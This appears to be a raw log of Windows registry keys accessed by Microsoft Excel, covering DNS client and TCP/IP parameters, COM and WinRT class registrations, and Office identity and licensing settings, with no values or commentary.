HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\CLSID\{0000034B-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{0000034B-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0000034B-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\CLSID\{0000034B-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\PackagedCom
HKEY_LOCAL_MACHINE\Software\Classes\PackagedCom
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000034b-0000-0000-c000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Wow6432Node\Microsoft\LanguageOverlay\OverlayPackages\en-US
HKEY_LOCAL_MACHINE\Software\Microsoft\LanguageOverlay\OverlayPackages\en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FormulaBarExpandedLines
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FormulaBarExpanded
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters\WinSock_Registry_Version
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ScreenDefaultServers
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters\AutodialDLL
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\FilterClusterIp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UseEdns
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\QueryIpMatching
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UseHostsFile
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\AddrConfigControl
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableSmartNameResolution
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\PreferLocalOverLowerBindingDNS
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\QueryNetBTFQDN
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableSmartProtocolReordering
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UdpRecvBufferSize
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableParallelAandAAAA
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableCoalescing
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\FilterVPNTrigger
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMultiHomedRouteConflicts
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ForceQueriesOverTcp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ShareTcpConnections
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegistrationEnabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DisableDynamicUpdate
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegisterPrimaryName
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegisterAdapterName
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegisterReverseLookup
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DisableReverseAddressRegistrations
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegisterWanAdapters
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DisableWanDynamicUpdate
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegistrationTtl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DefaultRegistrationTTL
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DefaultRegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MaxCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MaxCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableServerUnreachability
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMulticast
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MulticastResponderFlags
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MulticastSenderFlags
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DnsTest
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UseCompartments
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\CacheAllCompartments
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UseNewRegistration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ResolverRegistration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ResolverRegistrationOnly
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\NewDhcpSrvRegistration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DirectAccessPreferLocal
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableIdnEncoding
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableIdnMapping
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ShortnameProxyDefault
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableNRPTForAdapterRegistration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\TestMode_AdaptiveTimeoutHistoryLength
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Hostname
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\SignedOutMSAUser
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSClient
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16924&crev=3\0\EndDate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\Compatibility\EXCEL.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\Compatibility\EXCEL.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\System\CurrentControlSet\Control\Compression
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Compression
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\SubscriptionCustomerLicenseInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\PerpetualLicenseInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\LicenseCategoryInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Fonts\CloudFontsURL
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\LicenseSKUInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\ProviderId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\TrustedSiteUrlForUserAgentVersionInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DocumentSyncTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Diagnostics.AsyncCausalityTracer\ActivationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\TokenBroker\ActivatableClasses
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\TokenBroker\ServerType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Attributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\TokenBroker\ExplicitPsmActivationType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\InitFolderHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\TokenBroker\CustomAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\PropertyBag
HKEY_CURRENT_USER\Software\Classes\Interface\{07650A66-66EA-489D-AA90-0DABC75F3567}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{07650A66-66EA-489D-AA90-0DABC75F3567}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{07650A66-66EA-489D-AA90-0DABC75F3567}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{07650A66-66EA-489D-AA90-0DABC75F3567}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{07650A66-66EA-489D-AA90-0DABC75F3567}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\Elevation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\NameBoxWidth
HKEY_CURRENT_USER\Software\Classes\Interface\{AF86E2E0-B12D-4C6A-9C5A-D7AA65101E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{AF86E2E0-B12D-4C6A-9C5A-D7AA65101E90}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{AF86E2E0-B12D-4C6A-9C5A-D7AA65101E90}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{AF86E2E0-B12D-4C6A-9C5A-D7AA65101E90}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{AF86E2E0-B12D-4C6A-9C5A-D7AA65101E90}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{AF86E2E0-B12D-4C6A-9C5A-D7AA65101E90}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{AF86E2E0-B12D-4C6A-9C5A-D7AA65101E90}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{57D369EE-7364-4AB0-A307-BDD25BCE408C}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{57D369EE-7364-4AB0-A307-BDD25BCE408C}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{57D369EE-7364-4AB0-A307-BDD25BCE408C}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{57D369EE-7364-4AB0-A307-BDD25BCE408C}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{57D369EE-7364-4AB0-A307-BDD25BCE408C}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{57D369EE-7364-4AB0-A307-BDD25BCE408C}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{57D369EE-7364-4AB0-A307-BDD25BCE408C}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\ClickToRun\Inventory\Office\16.0
HKEY_CURRENT_USER\Software\Classes\Interface\{B5A6F1BC-1641-5F4C-B946-79084E41EE35}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{B5A6F1BC-1641-5F4C-B946-79084E41EE35}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{B5A6F1BC-1641-5F4C-B946-79084E41EE35}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{B5A6F1BC-1641-5F4C-B946-79084E41EE35}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{B5A6F1BC-1641-5F4C-B946-79084E41EE35}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{B5A6F1BC-1641-5F4C-B946-79084E41EE35}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{B5A6F1BC-1641-5F4C-B946-79084E41EE35}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{9E8E4BD8-BFC5-4785-94C2-B210DB698776}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{9E8E4BD8-BFC5-4785-94C2-B210DB698776}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{9E8E4BD8-BFC5-4785-94C2-B210DB698776}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{9E8E4BD8-BFC5-4785-94C2-B210DB698776}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{9E8E4BD8-BFC5-4785-94C2-B210DB698776}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{9E8E4BD8-BFC5-4785-94C2-B210DB698776}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{9E8E4BD8-BFC5-4785-94C2-B210DB698776}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ADALEnvironment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\Interface\{E60E20A2-87A0-4B34-8502-EE3B8FB4EC16}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{E60E20A2-87A0-4B34-8502-EE3B8FB4EC16}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{E60E20A2-87A0-4B34-8502-EE3B8FB4EC16}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{E60E20A2-87A0-4B34-8502-EE3B8FB4EC16}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{E60E20A2-87A0-4B34-8502-EE3B8FB4EC16}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{E60E20A2-87A0-4B34-8502-EE3B8FB4EC16}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{E60E20A2-87A0-4B34-8502-EE3B8FB4EC16}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{63A0A1E5-F8FE-4BA6-8508-CAEF1277DD35}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{63A0A1E5-F8FE-4BA6-8508-CAEF1277DD35}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\Threading
